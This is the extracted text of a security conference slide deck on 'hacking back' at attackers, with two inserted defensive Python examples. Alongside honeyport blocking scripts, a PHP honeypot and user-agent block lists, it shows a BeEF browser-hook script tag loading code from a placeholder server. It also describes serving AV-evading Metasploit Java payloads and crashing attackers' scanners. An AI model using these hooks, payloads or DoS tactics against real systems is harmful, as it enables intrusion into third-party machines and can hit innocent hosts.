Bringing Sexy Back:
Defensive Measures That Actually Work




       Paul Asadoorian (paul@pauldotcom.com)
        John Strand (john@pauldotcom.com)
               http://pauldotcom.com
Paul Asadoorian


Goal: Bring Sexy Back
Outline
• # whoami
• Introduction - OODA, Don’t run away
• Case Studies - Reasons why we CAN do this
• Warning banners - Allows you to do things you disclose
• Annoyance - Mr. Clippy, User Agent, Spider Traps
• Attribution - BeEF, Metasploit Decloak
• Attack - SET, Java payloads, purple ASCII art

Introduction

Yes, I said “Hacking Back” but don’t run away

Disclaimer
The contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.
Any action you take from this presentation should be documented in writing before implementing.

First off, why are we talking about “hacking back”?

Successful Penetration Tests
• Most organizations provide easy access to their “intellectual property”
    • How many pen tests have you been on?
    • How many of those were successful?
• Or?
    • How many women have you dated?
    • How many have you slept with?

Why Are Penetration Tests Always So Successful?

1. Flimsy Defensive “Layers”

2. Social Engineering
Because there is no patch for human stupidity...

3. Passwords

4. Software Vulnerabilities

John & Paul Then Thought
• We can do better
• What if we were to defend systems, applying what we know about attacks?
• For so long we’ve gone down the beaten path that we call “security”
• It’s time to break the mold
We also thought about how messy we get when eating noodles, but someone beat us to the solution...

Why Use Offensive Counter Measures?
• There are times where you will be required to do “more”
    • In particular when working with law enforcement
• The attackers are getting more and more brazen
    • Very little perceived risk on their part
    • We have rules, they don’t follow rules
• You may need to figure out what an attacker is after or gather information about them
    • e.g. If they are attacking from a bot-net or through TOR

OODA
• Whoever can do these things the fastest lives:
    • Observe
    • Orient
    • Decide
    • Act
• Originally developed for fighter-pilots
• With current security models how many can you impact?
• Works both ways, Dis-Orient attackers!
John Boyd
Paul, “fighting”

Case Studies

Stuff other people did that makes what we’re going to do look okay

Case Study: Consent to University Network Terms
• Sysadmin hacks into threatening machine
    • Gathered evidence used against student using temp/temp creds
    • Student’s consent to university terms justifies sysadmin
    • U.S. v. Heckenkamp
• Kevin Poulsen, “Court Okays Counter-Hack of eBay Hacker's Computer,” Threat Level, April 6, 2007,
    • http://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html

“A federal appeals court just shot down an attempt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convictions, which were an end result of information provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.”

Case Study: Public Example of Reflected Attack
• 1999 - World Trade Organization web site
• DOS attack from E-Hippies Coalition
• Hosting service Conxion reflected the attack back to E-Hippies and disabled its web site
• Conxion not prosecuted
    • http://www.networkworld.com/research/2000/0529feat2.html

"So we told our filtering software to redirect any packets coming from these machines back at the e-hippies Web server"

Case Study: MSFT Court Order – Botnet
• Civil lawsuit 2010
• Court issues order to suspend the domains associated with the Waledac botnet
• MSFT takes “other technical measures” to degrade the botnet
    • www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber-Defense-Law-Botnet-Computer-Crime-Lawsuit

“Notice that Microsoft is not doing this in the dark. It is working through our open public court system, so that Microsoft is transparent and accountable and all can see what is happening and evaluate it.”

Case Study: DOJ Takes Over 2 Million Node Botnet
• A judge gave permission to FBI and U.S. Marshals to set up servers to stop the Coreflood botnet
• They were also given permission “to send commands to infected computers that stops the Coreflood virus”
• They seized 5 servers and 29 domain names
• DOJ now owns 2.5 million computers on the Internet, and will essentially tell the malware to self-destruct
• What, this isn’t sexy enough for you?

Let’s Pretend I’m a Lawyer
• I’m advising you to:
    • Discuss
    • Document
    • Plan
• Consult with others, reveal your plans!
• Hiding intentions means you think what you are doing is “wrong”
• Rule of thumb: Don’t be evil
    • While it can seem like a lot of fun, it can get you in big trouble
Note: We love the EFF (eff.org go donate!)

Okay, Let’s Stop Pretending
• Could this get you into trouble?
    • Possibly. There is still some debate on how to do it properly
• There are a few things we can avoid to keep us from getting in trouble
    • Don’t ever put malware where it is publicly accessible
    • Don’t make it too easy to get to
• Use Warning Banners...

Warning Banners

Warning, we are going to talk about warning banners...

Look at Your Warning Banner
• There is a lot in there about permission
• There are a number of technologies that will “check” your system before it accesses the network
    • OpenVPN scripts (Like a NAC Check)
    • Windows 2008 Network Access Protection
• Is it possible to use this as a means to gather some information about an attacker system?
• Put in your warning banner that you can do what you want!

Example: Eric Needed a Warning Banner
• What do a kitchen knife, a crutch, and duct tape have to do with anything?
• It is illegal to set up lethal traps for trespassers
• However, if you tell them there may be evil things on your network/property you warned them

  "super went to open the door, felt resistance and found the rigged contraption"-- a big knife duct-taped to a crutch, which was installed with an elastic cord. The super was not injured.

  Eric Stetz was arrested and charged with reckless endangerment for a vicious-looking booby trap.
  http://gothamist.com/2008/04/06/homemade_booby.php

WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own risk!

Would this have kept Eric Stetz out of trouble?

FREE VASECTOMY

This likely would not have kept Eric Stetz out of trouble...

Reality Check: Don’t Be Stupid (like Eric)
• How could this go wrong for you?
    • Dumb moves (like knife crutches)
    • Easily accessible malware (e.g. traps)
    • Full attacks of attacker IP addresses
    • Purposely damaging systems
    • Persistent long-term access to bad guys
• We have smarter options to work with
    1. Annoyance
    2. Attribution
    3. Attack

Annoyance

Stressing out the attackers...

Annoyance: HoneyPorts
• Forces attackers to make a full connection to avoid spoofing pitfalls
• Attackers and testers hate this……..

    @echo off
    REM Find peers connected to TCP 3333 (token 3 of netstat output is the
    REM foreign address), strip the port, and add an inbound block rule for that IP.
    for /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do @for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rule name="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block

If a machine makes a full TCP connection to port 3333, a firewall rule is added to block the source IP address

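Annoyance: HoneyPorts
• Works on Linux too of course, same concept
• Must have working copy of Netcat on your system
• Should be modified to log entries and report back to enterprise SIEM

    # Run as root. Listen on TCP 2222 with netcat; on each full connection
    # nc -v reports "connect to [local] from host [remote] port" on stderr,
    # and the remote address is cut out of the second pair of brackets.
    while [ 1 ] ; echo "started" ; do
        IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`
        # Skip the rule when no address was parsed (iptables fails on an empty -s)
        [ -n "${IP}" ] && iptables -A INPUT -p tcp -s "${IP}" -j DROP
    done
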
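The slide above asks for the honeyport to log entries and report to the SIEM. As an added example (not from the original slides), this Python sketch accepts full TCP connections, emits one JSON event per connection and builds the same iptables rule as an argument list, skipping allowlisted sources so the honeyport cannot lock out your own hosts. The `NEVER_BLOCK` ranges, event field names and function names are assumptions.

```python
import ipaddress
import json
import socket
import time

# Assumption: addresses that must never be blocked (your own scanners,
# monitoring hosts, gateways). Replace with your real ranges.
NEVER_BLOCK = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "192.0.2.10/32")]


def decide(src_ip, already_blocked, never_block=NEVER_BLOCK):
    """Return 'allowlisted', 'duplicate' or 'block' for one source address."""
    addr = ipaddress.ip_address(src_ip)  # ValueError on anything but an IP
    if any(addr in net for net in never_block):
        return "allowlisted"
    if src_ip in already_blocked:
        return "duplicate"
    return "block"


def make_event(src_ip, src_port, honeyport, action, now=None):
    """Build one JSON line that a SIEM log forwarder can pick up."""
    return json.dumps({
        "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(now)),
        "event": "honeyport_connect",
        "src_ip": src_ip,
        "src_port": src_port,
        "dst_port": honeyport,
        "action": action,
    }, sort_keys=True)


def firewall_command(src_ip):
    """The iptables rule from the slide as an argv list (not executed here)."""
    ipaddress.ip_address(src_ip)  # refuse to build a rule from junk input
    return ["iptables", "-A", "INPUT", "-p", "tcp", "-s", src_ip, "-j", "DROP"]


def serve(listener, max_conns, never_block=NEVER_BLOCK, emit=print):
    """Accept max_conns connections on a listening socket; return the events."""
    blocked, events = set(), []
    honeyport = listener.getsockname()[1]
    for _ in range(max_conns):
        # accept() only returns after the three-way handshake completed,
        # so the peer address is not a blindly spoofed source.
        conn, (src_ip, src_port) = listener.accept()
        conn.close()
        action = decide(src_ip, blocked, never_block)
        if action == "block":
            blocked.add(src_ip)
            # Hand this line to whatever privileged process applies rules.
            emit(" ".join(firewall_command(src_ip)))
        line = make_event(src_ip, src_port, honeyport, action)
        events.append(line)
        emit(line)
    return events


if __name__ == "__main__":
    PORT = 2222  # same port as the netcat loop on the slide
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", PORT))
        s.listen(16)
        serve(s, max_conns=100)
```
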
Annoyance: Mr. Clippy
• Through PHPIDS we can make attacking a website “interesting”
• First, install PHPIDS
• PHPIDS has clipping thresholds
• Then create a rule for all attackers to pull up Mr. Clippy

Annoyance: Making Your Website Look Like Something Else

Oh, you’re IIS, here are all my IIS attacks!

Annoyance: Filter User-Agent Strings
• Filter the User-Agents in use by attackers and testers:
    • Nikto, Acunetix, “IamHackingYou”
• Sites do not lock down the mobile version of web site
    • There has been a lot of research in this area by Chris John Riley
    • E.g. Using the iPhone User-Agent reveals mobile version of site
    • Some people don’t secure the mobile version
• What if you present traps or DoS conditions based on User-Agent?

Annoyance: Messing with Attackers’ Heads

    <?php
    // Honeypot page referenced only from robots.txt: a request for it means
    // the visitor read the Disallow entry and went looking. Mail an alert.
    $ip = getenv('REMOTE_ADDR');
    $useragent = getenv('HTTP_USER_AGENT');

    $to = "yournonproductionemail@example.com";
    $subject = "Robots honeypot from " . $ip;
    $body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;

    mail($to, $subject, $body);

    echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1></html>");

    // The User-Agent is attacker-controlled, so escape it before echoing it back.
    echo("Your IP address is: " . htmlspecialchars($ip) . "\n");
    echo("Your User Agent is: " . htmlspecialchars($useragent) . "\n");
    ?>

Credit Josh Wright: http://mail.pauldotcom.com/pipermail/pauldotcom/2009-February/000713.html

Annoyance: Messing with Attackers’ Heads

This all happened in the same day!

Fun part is we get to make things up as to why this happened...

Annoyance: Evil Web Servers
• Many testers and attackers use automated crawling
    • This helps identify pages and possible insertion points for their attacks
    • If they say they don’t, they are probably lying
• *Maybe* there is a way to attack the tools
    • Setting up a DoS condition for their automated scanner
• Note: This is not something you want to try on an external webserver that you want to have crawled by Google
    • Configure robots.txt to point to resources you control
    • NOT something you put in your index.php page!

Exploiting Existing Vulnerabilities
• Acunetix DoS in Sniffer Component
  • http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23507
• Webinspect Crashes Loading Reports
  • http://seclists.org/educause/2009/q3/526
    “We can run the scans but if you select a report that has critical vulnerabilities in it the report generator crashes with invalid characters.”
• AppScan Vulnerabilities
  • SSL: https://www-304.ibm.com/support/docview.wss?uid=swg1PM24290
  • Login Recording: https://www-304.ibm.com/support/docview.wss?uid=swg1PM04998

Evil Annoyance: Fuzzing Attacker Tools
• Why not browse the attackers/testers tools?
• There are a number of different browser fuzzers available
    • Bf3, Sulley, Python
• We can also use DOM-Hanoi
    • Geared towards browser fuzzing, but hey. It works
    • Actually, it just takes a long time to run
• Goal: Build a page that consistently crashes the attacker’s tool!

Annoyance: Setting Traps

SpiderTrap & WebLabyrinth
• Spidertrap: Small Python script to trap web spiders
• Ben Jackson created a PHP version called WebLabyrinth
• It is PHP so you can load it in your web infrastructure
• Has a number of cool features
    • Gently tells Googlebot to go away
    • Random HTTP codes
    • *NEW* Database Support
    • *NEW* Alerting with IDS-style rules
• David Bowie Approved

Prevention: Nessus Example

Keeping it “Real”

Wget: Falling Into The Trap

Now for W3AF

This is Going to Take a While...
Also annoying

Helps the Internet Be a Better Place?

The IP Address 209.20.92.14 wandered into the labyrinth:

    [17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]

“/admin” on my server redirects people or bots to the labyrinth:

    209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"

Interesting User Agent, eh?

Helps the Internet Be a Better Place?
• Turns out “ZmEu” is a popular string for the user agent to contain for bots looking for insecure web applications
• If the automated bots waste time in my labyrinth, that’s less time they spend attacking other sites
• It’s also less time they spend on my own site trying lame attacks that likely would not work anyway
• My “traps” should also spring on some of the following requests as well:

    [client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpmyadmin
    [client 209.190.23.66] File does not exist: /var/lib/mediawiki/phpMyAdmin
    [client 209.190.23.66] File does not exist: /var/lib/mediawiki/dbadmin
    [client 209.190.23.66] File does not exist: /var/lib/mediawiki/myadmin
    [client 209.190.23.66] File does not exist: /var/lib/mediawiki/MyAdmin

Laughing at me or laughing at them?
• Nice to see attackers are smiling at me, or not
• Multiple attempts from different IPs across multiple servers
• About “anti-sec”:
      The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed] movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.

    [client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)
    65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
    72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
    89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"

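The log excerpts on the last three slides can be turned into a detection. As an added example (not part of the original deck), this Python script flags combined-format access-log lines whose User-Agent or path matches the markers shown on the slides and counts hits per source IP. The sample lines are constructed with documentation addresses, and the function names and marker lists are assumptions.

```python
import re
from collections import defaultdict

# Apache "combined" format, as in the access-log lines quoted on the slides.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# User-Agent substrings named in the deck (ZmEu, Nikto, Acunetix).
UA_MARKERS = ("zmeu", "nikto", "acunetix")
# Path fragments from the deck's log excerpts; assumed not to exist on the site.
TRAP_PATHS = ("/admin", "phpmyadmin", "dbadmin", "myadmin", "w00tw00t")

# Constructed sample input (not real traffic); the last line is deliberately broken.
SAMPLE_LOG = '''
203.0.113.10 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team"
203.0.113.10 - - [17/Mar/2011:21:32:04 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 239 "-" "ZmEu"
198.51.100.7 - - [17/Mar/2011:21:40:00 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Mar/2011:21:41:00 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
this line is truncated
'''


def classify(line):
    """Return (ip, reasons) for a parsable line, or None if it does not parse."""
    m = LINE.match(line)
    if m is None:
        return None
    ua, path = m["ua"].lower(), m["path"].lower()
    reasons = ["ua:" + u for u in UA_MARKERS if u in ua]
    # Only the first matching fragment is recorded, so "/phpmyadmin"
    # is not double-counted as "myadmin" too.
    hit = next((p for p in TRAP_PATHS if p in path), None)
    if hit:
        reasons.append("path:" + hit)
    return m["ip"], reasons


def summarize(lines):
    """Aggregate flagged requests per source IP; also count unparsable lines."""
    acc = defaultdict(lambda: {"hits": 0, "reasons": set()})
    unparsed = 0
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            unparsed += 1
            continue
        ip, reasons = parsed
        if reasons:
            acc[ip]["hits"] += 1
            acc[ip]["reasons"].update(reasons)
    report = {ip: {"hits": v["hits"], "reasons": sorted(v["reasons"])}
              for ip, v in acc.items()}
    return report, unparsed


def repeat_offenders(report, min_hits):
    """Source IPs with at least min_hits flagged requests, sorted."""
    return sorted(ip for ip, v in report.items() if v["hits"] >= min_hits)


if __name__ == "__main__":
    rep, bad = summarize(SAMPLE_LOG.strip().splitlines())
    for ip in sorted(rep):
        print(ip, rep[ip]["hits"], ",".join(rep[ip]["reasons"]))
    print("unparsed lines:", bad)
```
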
Attribution

I can still see you...

Protecting Your Intellectual Property
• “Callbacks” - Similar to Software updates
    • Sends information back to home base about system
    • IP address, hardware and software configurations
    • Microsoft Genuine Advantage, crash dumps
• Tracking software in phones
    • Just look at Android... Does “checkers” really need access to my contact list and call history?
• We are not necessarily talking about “hacking” per se
    • We are talking about getting attribution

Send my information to Microsoft?

Word Web-Bugs
• Feature built into exploit frameworks for penetration testing
• This tactic works great at tracking intellectual property
• Not all ways of attribution need result in shell access
• Far less likely to crash a system
• Embed this code in a spreadsheet called SSN.xls and watch how fast an attacker runs the macros
• Callback should go to a closely monitored system
This is like Spy Stuff, like James Bond...
“Ohhhhhh James...”
See, Defense IS Sexy! Eh?

How does it work?
• It simply inserts a reference to a css running on the system, in this case, running Core IMPACT
• When the doc is opened it tries to open the URL
• Direct connection!

Web Application Street fighting
• How can we use JavaScript against the attackers?
• BeEF (Browser Exploitation Framework)
    • Harvest information
    • Send direct links
    • Possibly exploit their systems (XMLRPC)
• Maybe we could just mess with them
    • Send indications of XSS and SQLi in every response to their attacks
• We need to have a wide variety of tools and techniques

BeEF: Get the attacker to connect
• Lead the attacker to decoy site that no legit user would visit
• Example: robots.txt:
             User-agent: *
             Disallow: /admin/admin.php

• Example: admin.php displays a bogus login page
• Hidden in admin.php is “The Hook”:
• <script language='Javascript' src='http://<your server>/beef/hook/beefmagic.js.php'></script>

I like ninja grappling hooks....

Hooked on BeEF: Now what?
• Capabilities are broad
    • Gather info
    • Browser type and version, OS type and version, screen resolution, etc.
    • Simple popup:

Attackers use IIS 6.0? No Way!

BeEF Modules
• The issue is deciding how far to go
    • Do you cross the line between info gathering and attacking the attacker(s) system?
    • You can do that with BeEF, not saying that you should, but you can if you have permission
• Cross the line: Many built-in modules
    • Metasploit integration: Browser Autopwn, SMB Challenge Theft, etc.
    • DoS may be okay, and this seems like a good place to build a DoS for your favorite, or not so favorite, hacking tool
    • Example: Find an exploit for Nikto and put it into BeEF

BeEF Modules (2)

Send them to your competition

Who are they really?
How are they hiding?
Who else have they hacked?

Attribution: Decloak
• From the Metasploit project
    • More information http://decloak.net/
    • Great place to redirect users from robots.txt
    • Many attackers and penetration testers will use proxies and/or Tor to hide their IP address
    • Decloak can reveal the real IP address of the scanner

“This tool demonstrates a system for identifying the real IP address of a web user, regardless of proxy settings, using a combination of client-side technologies and custom services.”

Looking at the Components of Decloak

Now, for Java

The DNS Server

Compile and Start

Now, Surf to Your Linux System

Checking the Database

Viewing the Data

Wireless Countermeasure Example
• Step 1: Set up a hidden SSID (“private” or “guest”)
• Step 2: Use a captive portal when people connect to it
• Step 3: Portal login page contains BeEF hook or SET exploit (use your warning banner!)
• Step 4: Collect information about attacker (dissolvable agents)
• Step 5: (OPTIONAL) Ban Wifi Mac on WIPS and/or Wireless network (works until they change it)

Gotchas
• Make sure SSID has access to nothing or just more honeypots
• Tough one: Prevent real users from connecting to it
• Tougher one: Make attackers think it’s a real SSID & network
• Danger: Make sure your BeEF server is not a jumping off point

Pwning yourself is not fun

Wireless: More Thoughts
• Send wireless driver exploits on the network, triggered by some event
    • Easily will backfire...
• Answer to clients probing for non-production networks, send them to a page that tells them they are mis-configured (beat the attackers to it)
    • May really piss off users
• Bluetooth Canary - Leave Bluetooth phone with OBEX enabled
    • Have address book with numbers that all route to you

Attack

Gopher is an old protocol too...

Attack: Java Payload
• If we can get an attacker to load a Java payload, why not give them something interesting, like a Metasploit payload?
• Java payloads are awesome for penetration testers, no vulnerabilities required!
• They can also be useful for attackers...
Just for @beaker and @attrition

Evil Java Application
• Embed a malicious Java Application in a non-production web server
    • Usually in a directory that is noindex and/or nofollow in robots.txt
• The attacker/victim will get a pop-up asking if they want to open the Java application
• They will, attackers tend to be very curious
• The payload can be flexible (Shell, Rootkit, VNC)
• You can automatically run enumeration scripts when the attacker/victim runs the application

Browsing to Your Site
http://[Your Linux IP]
Everyone Clicks “Run”

Configuring SET
Dave Kennedy, the author of SET, loves purple.

Website Attacks are Key

Using Java... Glorious Java

Default Templates

Choosing your Payload

Encoding to Dodge AV

You Say YES!!

Have Your Backtrack System Surf to SET

Not Pretty.. But it Works

Precautions and Usage
• Put this on the inside of the network
• Careful an attacker doesn’t redirect your users
• Make sure no one can take over your Metasploit instance
• Don’t have to do anything with the shell
    • You can autorun certain non-damaging commands
    • ping your system

Listen

-   http://pauldotcom.com/radio (24/7)

-   Podcast in iTunes (audio/video)

Watch

-   Live! http://pauldotcom.com/live

-   “TV” http://pauldotcom.blip.tv
Participate

-   Mailing List: http://mail.pauldotcom.com

-   Community: http://pauldotcom.com/insider

-   IRC: irc.freenode.net #pauldotcom

Read

-   http://pauldotcom.com (Blog)

-   Email us psw@pauldotcom.com
Want More? (Shameless Plug)

OFFENSIVE COUNTERMEASURES: DEFENSIVE TACTICS THAT ACTUALLY WORK
Black Hat Las Vegas 2011
Register Today!

The End

Wake up, time for Questions?

More Related Content

Viewers also liked

Who should the security team hire next?
Who should the security team hire next?Who should the security team hire next?
Who should the security team hire next?Source Conference
 
Google + Google = Tea
Google + Google = Tea Google + Google = Tea
Google + Google = Tea Mark Roman
 
OneIS CANHEIT V03 NN
OneIS CANHEIT V03 NNOneIS CANHEIT V03 NN
OneIS CANHEIT V03 NNMark Roman
 
IT and Higher Education: Where are We Headed?
IT and Higher Education: Where are We Headed?IT and Higher Education: Where are We Headed?
IT and Higher Education: Where are We Headed?Mark Roman
 
David Snead - Nailing Down Security Regulations
David Snead - Nailing Down Security RegulationsDavid Snead - Nailing Down Security Regulations
David Snead - Nailing Down Security RegulationsSource Conference
 
Everything I Needed to Know About IT Leadership I Learned from Star Trek
Everything I Needed to Know About IT Leadership I Learned from Star TrekEverything I Needed to Know About IT Leadership I Learned from Star Trek
Everything I Needed to Know About IT Leadership I Learned from Star TrekMark Roman
 
Wim Remes SOURCE Boston 2011
Wim Remes SOURCE Boston 2011 Wim Remes SOURCE Boston 2011
Wim Remes SOURCE Boston 2011 Source Conference
 
Why Does IT Cost So Much CANHEIT v10
Why Does IT Cost So Much CANHEIT v10Why Does IT Cost So Much CANHEIT v10
Why Does IT Cost So Much CANHEIT v10Mark Roman
 
Information Systems Governance
Information Systems GovernanceInformation Systems Governance
Information Systems GovernanceMark Roman
 

Viewers also liked (9)

Who should the security team hire next?
Who should the security team hire next?Who should the security team hire next?
Who should the security team hire next?
 
Google + Google = Tea
Google + Google = Tea Google + Google = Tea
Google + Google = Tea
 
OneIS CANHEIT V03 NN
OneIS CANHEIT V03 NNOneIS CANHEIT V03 NN
OneIS CANHEIT V03 NN
 
IT and Higher Education: Where are We Headed?
IT and Higher Education: Where are We Headed?IT and Higher Education: Where are We Headed?
IT and Higher Education: Where are We Headed?
 
David Snead - Nailing Down Security Regulations
David Snead - Nailing Down Security RegulationsDavid Snead - Nailing Down Security Regulations
David Snead - Nailing Down Security Regulations
 
Everything I Needed to Know About IT Leadership I Learned from Star Trek
Everything I Needed to Know About IT Leadership I Learned from Star TrekEverything I Needed to Know About IT Leadership I Learned from Star Trek
Everything I Needed to Know About IT Leadership I Learned from Star Trek
 
Wim Remes SOURCE Boston 2011
Wim Remes SOURCE Boston 2011 Wim Remes SOURCE Boston 2011
Wim Remes SOURCE Boston 2011
 
Why Does IT Cost So Much CANHEIT v10
Why Does IT Cost So Much CANHEIT v10Why Does IT Cost So Much CANHEIT v10
Why Does IT Cost So Much CANHEIT v10
 
Information Systems Governance
Information Systems GovernanceInformation Systems Governance
Information Systems Governance
 

Similar to Paul Asadoorian - Bringing Sexy Back

Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...EC-Council
 
Paul Asadoorian - Bringing Sexy Back